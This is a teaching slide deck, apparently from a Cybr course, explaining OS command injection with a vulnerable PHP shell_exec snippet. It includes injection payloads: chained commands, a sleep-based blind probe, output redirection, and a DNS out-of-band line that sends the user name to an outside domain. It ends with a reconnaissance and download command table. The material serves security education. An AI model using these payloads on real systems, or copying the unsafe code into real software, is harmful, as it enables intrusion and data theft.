Christophe Limpalair
Co-Founder of Cybr, and Course Author
OS Command Injections
What are OS Command Injections?
Potential Impact of OS Command Injections
- Local network infiltration
- Access to sensitive data
- Upload or download of data, malware
- Creating custom scripts on the victim server
- Running those scripts or other apps as an admin
- Editing user security levels and permissions
When are these injections possible?
When unsafe user-supplied data is allowed to be injected in a system shell from the application
What is a shell?
Shell is simply an interactive command language that also doubles up as a scripting language
What OS Command Injections Look Like
<?php
// Delete the selected file
$file = $_GET['filename'];
shell_exec("rm $file");
?>What OS Command Injections Look Like
<?php
// Delete the selected file
$file = $_GET['filename'];
shell_exec("rm $file");
?>rm <filename> <-- delete files or directoriesWhat OS Command Injections Look Like
<?php
// Delete the selected file
$file = $_GET['filename'];
shell_exec("rm $file");
?>rm <filename> <-- delete files or directories# OS command injection example
rm old_file.txt; pwd # OS command injection example
rm old_file.txt; pwd pwd outputs the full pathname of the current working directory
# Unix-based systems
;
# Windows & Unix-based systems
&Blind OS Command Injections
Blind OS Command Injections
- Time-based attacks
- Redirecting output
Time-based attacks
rm old_file.txt; pwd; sleep 5Time-based attacks
Time-based attacks add a delay to the expected response, on purpose, to verify whether the application is vulnerable
rm old_file.txt; pwd; sleep 5Redirecting Output
& whoami > /var/www/static/whoami.txt &Redirecting Output
& whoami > /var/www/static/whoami.txt &https://vulnerable-website.com/whoami.txt
Out-of-band Attacks
& nslookup https://cybr.com &Out-of-band Attacks
& nslookup https://cybr.com &; nslookup `whoami`.cybr.com ;Out-of-band Attacks
& nslookup https://cybr.com &; nslookup `whoami`.cybr.com ;www-data.cybr.com
Useful commands
Source: Cybr & Portswigger
| Purpose of command | Linux | Windows |
|---|---|---|
| Name of current user | whoami | whoami |
| Operating system | uname -a | ver |
| Network configuration | ifconfig | ifconfig /all |
| Network connections | netstat -an | netstat -an |
| Running processes | ps -ef | tasklist |
| Identify the location (and existence) of executables | which | where |
| Download file | wget | (new-object System.Net.WebClient).DownloadFile($url, $path) |
| Sleep/timeout | sleep | Use ping or timeout in batch file |
| Current directory | pwd | dir |
OS Command Injections Overview
By Christophe Limpalair
